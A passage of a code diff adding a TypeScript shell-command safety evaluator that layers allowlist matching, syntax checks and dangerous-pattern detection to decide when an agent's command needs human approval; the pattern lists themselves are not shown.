+    }
+
+    if (ch === '"' && !inSingleQuote) {
+      inDoubleQuote = !inDoubleQuote;
+      current += ch;
+      continue;
+    }
+
+    if (ch === "|" && !inSingleQuote && !inDoubleQuote) {
+      // Check for |& or ||
+      const next = command[i + 1];
+      if (next === "&" || next === "|") return null; // dangerous
+      parts.push(current.trim());
+      current = "";
+      continue;
+    }
+
+    current += ch;
+  }
+
+  if (current.trim()) {
+    parts.push(current.trim());
+  }
+
+  return parts.length > 0 ? parts : null;
+}
+
+/**
+ * Analyze shell syntax for dangerous constructs.
+ * Returns list of reasons if dangerous syntax is found.
+ */
+export function analyzeShellSyntax(command: string): string[] {
+  const reasons: string[] = [];
+
+  for (const { regex, reason } of DANGEROUS_SYNTAX) {
+    if (regex.test(command)) {
+      reasons.push(reason);
+    }
+  }
+
+  return reasons;
+}
+
+/**
+ * Detect dangerous command patterns.
+ * Returns list of reasons if dangerous patterns are found.
+ */
+export function detectDangerousPatterns(command: string): string[] {
+  const reasons: string[] = [];
+
+  for (const { regex, reason } of DANGEROUS_PATTERNS) {
+    if (regex.test(command)) {
+      reasons.push(reason);
+    }
+  }
+
+  return reasons;
+}
+
+/**
+ * Main safety evaluation function.
+ * Evaluates a shell command through multiple safety layers.
+ */
+export function evaluateCommandSafety(
+  command: string,
+  config?: ExecApprovalConfig,
+): SafetyEvaluation {
+  const allowlist = config?.allowlist ?? [];
+  const allReasons: string[] = [];
+
+  // Layer 1: Allowlist matching
+  const allowlistMatch = matchAllowlist(allowlist, command);
+  if (allowlistMatch) {
+    return {
+      riskLevel: "safe",
+      reasons: [],
+      analysisOk: true,
+      allowlistSatisfied: true,
+    };
+  }
+
+  // Layer 2: Shell syntax analysis
+  const syntaxReasons = analyzeShellSyntax(command);
+  const analysisOk = syntaxReasons.length === 0;
+  if (!analysisOk) {
+    allReasons.push(...syntaxReasons);
+  }
+
+  // Layer 3: Safe binary detection
+  if (analysisOk && isSafeBinUsage(command)) {
+    return {
+      riskLevel: "safe",
+      reasons: [],
+      analysisOk: true,
+      allowlistSatisfied: false,
+    };
+  }
+
+  // Layer 4: Dangerous pattern detection
+  const dangerousReasons = detectDangerousPatterns(command);
+  allReasons.push(...dangerousReasons);
+
+  // Determine risk level
+  let riskLevel: "safe" | "needs-review" | "dangerous";
+  if (dangerousReasons.length > 0 || !analysisOk) {
+    riskLevel = "dangerous";
+  } else {
+    riskLevel = "needs-review";
+  }
+
+  return {
+    riskLevel,
+    reasons: allReasons,
+    analysisOk,
+    allowlistSatisfied: false,
+  };
+}
+
+// ============ Policy Helpers ============
+
+/**
+ * Determine if human approval is required.
+ * Same logic as OpenClaw's requiresExecApproval.
+ */
+export function requiresApproval(params: {
+  ask: ExecAsk;
+  security: ExecSecurity;
+  analysisOk: boolean;
+  allowlistSatisfied: boolean;
+}): boolean {
+  const { ask, security, analysisOk, allowlistSatisfied } = params;
+
+  if (ask === "always") return true;
+  if (ask === "off") return false;
+
+  // ask === "on-miss"
+  if (security === "allowlist" && (!analysisOk || !allowlistSatisfied)) return true;
+
+  return false;
+}
+
+/**
+ * Merge two security levels, taking the stricter (lower) one.
+ * deny < allowlist < full
+ */
+export function minSecurity(a: ExecSecurity, b: ExecSecurity): ExecSecurity {
+  const order: Record<ExecSecurity, number> = { deny: 0, allowlist: 1, full: 2 };
+  return order[a] <= order[b] ? a : b;
+}
+
+/**
+ * Merge two ask modes, taking the more frequent (higher) one.
+ * off < on-miss < always
+ */
+export function maxAsk(a: ExecAsk, b: ExecAsk): ExecAsk {
+  const order: Record<ExecAsk, number> = { off: 0, "on-miss": 1, always: 2 };
+  return order[a] >= order[b] ? a : b;
+}